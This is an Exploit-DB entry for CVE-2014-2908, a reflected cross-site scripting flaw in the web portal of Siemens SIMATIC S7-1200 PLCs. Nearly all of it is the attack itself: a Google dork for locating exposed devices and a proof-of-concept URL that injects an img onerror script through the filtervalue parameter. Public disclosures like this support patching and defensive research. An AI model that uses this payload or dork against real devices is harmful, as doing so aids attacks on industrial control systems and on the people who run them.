Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting

EDB-ID: 44687
Author: t4rkd3vilz
Published: 2018-05-22
CVE: CVE-2014-2908
Type: Webapps
Platform: Linux
Vulnerable App: N/A 

 # Google Dork: inurl:/Portal/Portal.mwsl 
 # Date: 2018-05-22 
 # Exploit Author: t4rkd3vilz, Jameel Nabbo 
 # Vendor Homepage: https://www.siemens.com/ 
 # Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X. 
 # Tested on: Kali Linux 
 # CVE: CVE-2014-2908 
  
 http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue= 
 <http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img 
 src=x onerror=prompt(1);>&Send=Filter

Source: www.exploit-db.com
Related Posts